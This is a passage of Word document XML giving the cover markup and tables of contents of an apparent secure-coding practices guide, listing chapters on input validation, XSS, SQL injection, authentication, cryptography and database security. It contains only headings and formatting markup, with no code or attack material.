
<file path=[Content_Types].xml><?xml version="1.0" encoding="utf-8"?>
<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">
  <Override PartName="/word/settings.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.setting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Default ContentType="application/xml" Extension="xml"/>
  <Default ContentType="image/svg+xml" Extension="svg"/>
  <Default ContentType="image/jpeg" Extension="jpg"/>
  <Default ContentType="image/gif" Extension="gif"/>
  <Default ContentType="image/jpeg" Extension="jpeg"/>
  <Default ContentType="image/png" Extension="pn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8" name="cover.jpg"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="Cover" id="0" name="cover.jpg"/>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index_html">
        <w:r>
          <w:rPr>
            <w:color w:themeColor="hyperlink" w:val="0000FF"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Introduction</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:firstLine="0" w:firstLineChars="0" w:left="0" w:leftChars="0"/>
      </w:pPr>
      <w:hyperlink w:anchor="Top_of_index1_html">
        <w:r>
          <w:rPr>
            <w:color w:themeColor="hyperlink" w:val="0000FF"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Input Validation</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:firstLine="0" w:firstLineChars="0" w:left="0" w:leftChars="200"/>
      </w:pPr>
      <w:hyperlink w:anchor="Top_of_validation_html">
        <w:r>
          <w:rPr>
            <w:color w:themeColor="hyperlink" w:val="0000FF"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Validation</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:firstLine="0" w:firstLineChars="0" w:left="0" w:leftChars="200"/>
      </w:pPr>
      <w:hyperlink w:anchor="Top_of_sanitization_html">
        <w:r>
          <w:rPr>
            <w:color w:themeColor="hyperlink" w:val="0000FF"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Sanitization</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:firstLine="0" w:firstLineChars="0" w:left="0" w:leftChars="0"/>
      </w:pPr>
      <w:hyperlink w:anchor="Top_of_index2_html">
        <w:r>
          <w:rPr>
            <w:color w:themeColor="hyperlink" w:val="0000FF"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Output Encoding</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:firstLine="0" w:firstLineChars="0" w:left="0" w:leftChars="200"/>
      </w:pPr>
      <w:hyperlink w:anchor="Top_of_cross_site_scripting_html">
        <w:r>
          <w:rPr>
            <w:color w:themeColor="hyperlink" w:val="0000FF"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>XSS - Cross-Site Scripting</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:firstLine="0" w:firstLineChars="0" w:left="0" w:leftChars="200"/>
      </w:pPr>
      <w:hyperlink w:anchor="Top_of_sql_injection_html">
        <w:r>
          <w:rPr>
            <w:color w:themeColor="hyperlink" w:val="0000FF"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>SQL Injection</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:firstLine="0" w:firstLineChars="0" w:left="0" w:leftChars="0"/>
      </w:pPr>
      <w:hyperlink w:anchor="Top_of_index3_html">
        <w:r>
          <w:rPr>
            <w:color w:themeColor="hyperlink" w:val="0000FF"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Authentication and Password Management</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:firstLine="0" w:firstLineChars="0" w:left="0" w:leftChars="200"/>
      </w:pPr>
      <w:hyperlink w:anchor="Top_of_communicating_authentication_data_html">
        <w:r>
          <w:rPr>
            <w:color w:themeColor="hyperlink" w:val="0000FF"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Communicating authentication data</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:firstLine="0" w:firstLineChars="0" w:left="0" w:leftChars="200"/>
      </w:pPr>
      <w:hyperlink w:anchor="Top_of_validation_and_storage_html">
        <w:r>
          <w:rPr>
            <w:color w:themeColor="hyperlink" w:val="0000FF"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Validation and Storage</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:firstLine="0" w:firstLineChars="0" w:left="0" w:leftChars="200"/>
      </w:pPr>
      <w:hyperlink w:anchor="Top_of_password_policies_html">
        <w:r>
          <w:rPr>
            <w:color w:themeColor="hyperlink" w:val="0000FF"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Password policies</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:firstLine="0" w:firstLineChars="0" w:left="0" w:leftChars="200"/>
      </w:pPr>
      <w:hyperlink w:anchor="Top_of_other_guidelines_html">
        <w:r>
          <w:rPr>
            <w:color w:themeColor="hyperlink" w:val="0000FF"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Other guidelines</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:firstLine="0" w:firstLineChars="0" w:left="0" w:leftChars="0"/>
      </w:pPr>
      <w:hyperlink w:anchor="Top_of_index4_html">
        <w:r>
          <w:rPr>
            <w:color w:themeColor="hyperlink" w:val="0000FF"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Session Management</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:firstLine="0" w:firstLineChars="0" w:left="0" w:leftChars="0"/>
      </w:pPr>
      <w:hyperlink w:anchor="Top_of_index5_html">
        <w:r>
          <w:rPr>
            <w:color w:themeColor="hyperlink" w:val="0000FF"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Access Control</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:firstLine="0" w:firstLineChars="0" w:left="0" w:leftChars="0"/>
      </w:pPr>
      <w:hyperlink w:anchor="Top_of_index6_html">
        <w:r>
          <w:rPr>
            <w:color w:themeColor="hyperlink" w:val="0000FF"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Cryptographic Practices</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:firstLine="0" w:firstLineChars="0" w:left="0" w:leftChars="200"/>
      </w:pPr>
      <w:hyperlink w:anchor="Top_of_pseudo_random_generators_html">
        <w:r>
          <w:rPr>
            <w:color w:themeColor="hyperlink" w:val="0000FF"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Pseudo-Random Generators</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:firstLine="0" w:firstLineChars="0" w:left="0" w:leftChars="0"/>
      </w:pPr>
      <w:hyperlink w:anchor="Top_of_index7_html">
        <w:r>
          <w:rPr>
            <w:color w:themeColor="hyperlink" w:val="0000FF"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Error Handling and Logging</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:firstLine="0" w:firstLineChars="0" w:left="0" w:leftChars="200"/>
      </w:pPr>
      <w:hyperlink w:anchor="Top_of_error_handling_html">
        <w:r>
          <w:rPr>
            <w:color w:themeColor="hyperlink" w:val="0000FF"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Error Handling</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:firstLine="0" w:firstLineChars="0" w:left="0" w:leftChars="200"/>
      </w:pPr>
      <w:hyperlink w:anchor="Top_of_logging_html">
        <w:r>
          <w:rPr>
            <w:color w:themeColor="hyperlink" w:val="0000FF"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Logging</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:firstLine="0" w:firstLineChars="0" w:left="0" w:leftChars="0"/>
      </w:pPr>
      <w:hyperlink w:anchor="Top_of_index8_html">
        <w:r>
          <w:rPr>
            <w:color w:themeColor="hyperlink" w:val="0000FF"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Data Protection</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:firstLine="0" w:firstLineChars="0" w:left="0" w:leftChars="0"/>
      </w:pPr>
      <w:hyperlink w:anchor="Top_of_index9_html">
        <w:r>
          <w:rPr>
            <w:color w:themeColor="hyperlink" w:val="0000FF"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Communication Security</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:firstLine="0" w:firstLineChars="0" w:left="0" w:leftChars="200"/>
      </w:pPr>
      <w:hyperlink w:anchor="Top_of_http_tls_html">
        <w:r>
          <w:rPr>
            <w:color w:themeColor="hyperlink" w:val="0000FF"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>HTTP/TLS</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:firstLine="0" w:firstLineChars="0" w:left="0" w:leftChars="200"/>
      </w:pPr>
      <w:hyperlink w:anchor="Top_of_websockets_html">
        <w:r>
          <w:rPr>
            <w:color w:themeColor="hyperlink" w:val="0000FF"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>WebSockets</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:firstLine="0" w:firstLineChars="0" w:left="0" w:leftChars="0"/>
      </w:pPr>
      <w:hyperlink w:anchor="Top_of_index10_html">
        <w:r>
          <w:rPr>
            <w:color w:themeColor="hyperlink" w:val="0000FF"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>System Configuration</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:firstLine="0" w:firstLineChars="0" w:left="0" w:leftChars="0"/>
      </w:pPr>
      <w:hyperlink w:anchor="Top_of_index11_html">
        <w:r>
          <w:rPr>
            <w:color w:themeColor="hyperlink" w:val="0000FF"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Database Security</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:firstLine="0" w:firstLineChars="0" w:left="0" w:leftChars="200"/>
      </w:pPr>
      <w:hyperlink w:anchor="Top_of_connections_html">
        <w:r>
          <w:rPr>
            <w:color w:themeColor="hyperlink" w:val="0000FF"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Connections</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:firstLine="0" w:firstLineChars="0" w:left="0" w:leftChars="200"/>
      </w:pPr>
      <w:hyperlink w:anchor="Top_of_authentication_html">
        <w:r>
          <w:rPr>
            <w:color w:themeColor="hyperlink" w:val="0000FF"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Authentication</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:firstLine="0" w:firstLineChars="0" w:left="0" w:leftChars="200"/>
      </w:pPr>
      <w:hyperlink w:anchor="Top_of_parameterized_queries_html">
        <w:r>
          <w:rPr>
            <w:color w:themeColor="hyperlink" w:val="0000FF"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Parameterized Queries</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:firstLine="0" w:firstLineChars="0" w:left="0" w:leftChars="200"/>
      </w:pPr>
      <w:hyperlink w:anchor="Top_of_stored_procedures_html">
        <w:r>
          <w:rPr>
            <w:color w:themeColor="hyperlink" w:val="0000FF"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Stored Procedures</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:firstLine="0" w:firstLineChars="0" w:left="0" w:leftChars="0"/>
      </w:pPr>
      <w:hyperlink w:anchor="Top_of_index12_html">
        <w:r>
          <w:rPr>
            <w:color w:themeColor="hyperlink" w:val="0000FF"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>File Management</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:firstLine="0" w:firstLineChars="0" w:left="0" w:leftChars="0"/>
      </w:pPr>
      <w:hyperlink w:anchor="Top_of_index13_html">
        <w:r>
          <w:rPr>
            <w:color w:themeColor="hyperlink" w:val="0000FF"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Memory Management</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:firstLine="0" w:firstLineChars="0" w:left="0" w:leftChars="200"/>
      </w:pPr>
      <w:hyperlink w:anchor="Top_of_cross_site_request_forgery_html">
        <w:r>
          <w:rPr>
            <w:color w:themeColor="hyperlink" w:val="0000FF"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Cross-Site Request Forgery</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:firstLine="0" w:firstLineChars="0" w:left="0" w:leftChars="200"/>
      </w:pPr>
      <w:hyperlink w:anchor="Top_of_regular_expressions_html">
        <w:r>
          <w:rPr>
            <w:color w:themeColor="hyperlink" w:val="0000FF"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Regular Expressions</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:firstLine="0" w:firstLineChars="0" w:left="0" w:leftChars="0"/>
      </w:pPr>
      <w:hyperlink w:anchor="Top_of_howto_contribute_html">
        <w:r>
          <w:rPr>
            <w:color w:themeColor="hyperlink" w:val="0000FF"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>How To Contribute</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:firstLine="0" w:firstLineChars="0" w:left="0" w:leftChars="0"/>
      </w:pPr>
      <w:hyperlink w:anchor="Top_of_final_notes_html">
        <w:r>
          <w:rPr>
            <w:color w:themeColor="hyperlink" w:val="0000FF"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Final Notes</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pStyle w:val="Para 21"/>
        <w:pageBreakBefore w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t>Table of Contents</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 12"/>
      </w:pPr>
      <w:r>
        <w:t/>
      </w:r>
      <w:hyperlink w:anchor="Top_of_index_html" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t>Introduction</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
        <w:t>1.1</w:t>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text3"/>
        </w:rPr>
        <w:t/>
      </w:r>
      <w:hyperlink w:anchor="Top_of_index1_html" w:tooltip="">
        <w:r>
          <w:t>Input Validation</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
        <w:t>1.2</w:t>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 12"/>
      </w:pPr>
      <w:r>
        <w:t/>
      </w:r>
      <w:hyperlink w:anchor="Top_of_validation_html" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t>Validation</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
        <w:t>1.2.1</w:t>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 12"/>
      </w:pPr>
      <w:r>
        <w:t/>
      </w:r>
      <w:hyperlink w:anchor="Top_of_sanitization_html" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t>Sanitization</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
        <w:t>1.2.2</w:t>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text3"/>
        </w:rPr>
        <w:t/>
      </w:r>
      <w:hyperlink w:anchor="Top_of_index2_html" w:tooltip="">
        <w:r>
          <w:t>Output Encoding</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
        <w:t>1.3</w:t>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text3"/>
        </w:rPr>
        <w:t/>
      </w:r>
      <w:hyperlink w:anchor="Top_of_cross_site_scripting_html" w:tooltip="">
        <w:r>
          <w:t>XSS - Cross-Site Scripting</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
        <w:t>1.3.1</w:t>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text3"/>
        </w:rPr>
        <w:t/>
      </w:r>
      <w:hyperlink w:anchor="Top_of_sql_injection_html" w:tooltip="">
        <w:r>
          <w:t>SQL Injection</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
        <w:t>1.3.2</w:t>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text3"/>
        </w:rPr>
        <w:t/>
      </w:r>
      <w:hyperlink w:anchor="Top_of_index3_html" w:tooltip="">
        <w:r>
          <w:t>Authentication and Password Management</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
        <w:t>1.4</w:t>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text3"/>
        </w:rPr>
        <w:t/>
      </w:r>
      <w:hyperlink w:anchor="Top_of_communicating_authentication_data_html" w:tooltip="">
        <w:r>
          <w:t>Communicating authentication data</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
        <w:t>1.4.1</w:t>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text3"/>
        </w:rPr>
        <w:t/>
      </w:r>
      <w:hyperlink w:anchor="Top_of_validation_and_storage_html" w:tooltip="">
        <w:r>
          <w:t>Validation and Storage</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
        <w:t>1.4.2</w:t>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text3"/>
        </w:rPr>
        <w:t/>
      </w:r>
      <w:hyperlink w:anchor="Top_of_password_policies_html" w:tooltip="">
        <w:r>
          <w:t>Password policies</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
        <w:t>1.4.3</w:t>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text3"/>
        </w:rPr>
        <w:t/>
      </w:r>
      <w:hyperlink w:anchor="Top_of_other_guidelines_html" w:tooltip="">
        <w:r>
          <w:t>Other guidelines</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
        <w:t>1.4.4</w:t>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text3"/>
        </w:rPr>
        <w:t/>
      </w:r>
      <w:hyperlink w:anchor="Top_of_index4_html" w:tooltip="">
        <w:r>
          <w:t>Session Management</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
        <w:t>1.5</w:t>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text3"/>
        </w:rPr>
        <w:t/>
      </w:r>
      <w:hyperlink w:anchor="Top_of_index5_html" w:tooltip="">
        <w:r>
          <w:t>Access Control</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
        <w:t>1.6</w:t>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text3"/>
        </w:rPr>
        <w:t/>
      </w:r>
      <w:hyperlink w:anchor="Top_of_index6_html" w:tooltip="">
        <w:r>
          <w:t>Cryptographic Practices</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
        <w:t>1.7</w:t>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text3"/>
        </w:rPr>
        <w:t/>
      </w:r>
      <w:hyperlink w:anchor="Top_of_pseudo_random_generators_html" w:tooltip="">
        <w:r>
          <w:t>Pseudo-Random Generators</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
        <w:t>1.7.1</w:t>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text3"/>
        </w:rPr>
        <w:t/>
      </w:r>
      <w:hyperlink w:anchor="Top_of_index7_html" w:tooltip="">
        <w:r>
          <w:t>Error Handling and Logging</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
        <w:t>1.8</w:t>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text3"/>
        </w:rPr>
        <w:t/>
      </w:r>
      <w:hyperlink w:anchor="Top_of_error_handling_html" w:tooltip="">
        <w:r>
          <w:t>Error Handling</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
        <w:t>1.8.1</w:t>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 12"/>
      </w:pPr>
      <w:r>
        <w:t/>
      </w:r>
      <w:hyperlink w:anchor="Top_of_logging_html" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t>Logging</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
        <w:t>1.8.2</w:t>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text3"/>
        </w:rPr>
        <w:t/>
      </w:r>
      <w:hyperlink w:anchor="Top_of_index8_html" w:tooltip="">
        <w:r>
          <w:t>Data Protection</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
        <w:t>1.9</w:t>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text3"/>
        </w:rPr>
        <w:t/>
      </w:r>
      <w:hyperlink w:anchor="Top_of_index9_html" w:tooltip="">
        <w:r>
          <w:t>Communication Security</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
        <w:t>1.10</w:t>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 12"/>
      </w:pPr>
      <w:r>
        <w:t/>
      </w:r>
      <w:hyperlink w:anchor="Top_of_http_tls_html" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t>HTTP/TLS</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
        <w:t>1.10.1</w:t>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 12"/>
      </w:pPr>
      <w:r>
        <w:t/>
      </w:r>
      <w:hyperlink w:anchor="Top_of_websockets_html" w:tooltip="">
        <w:r>
          <w:rPr>
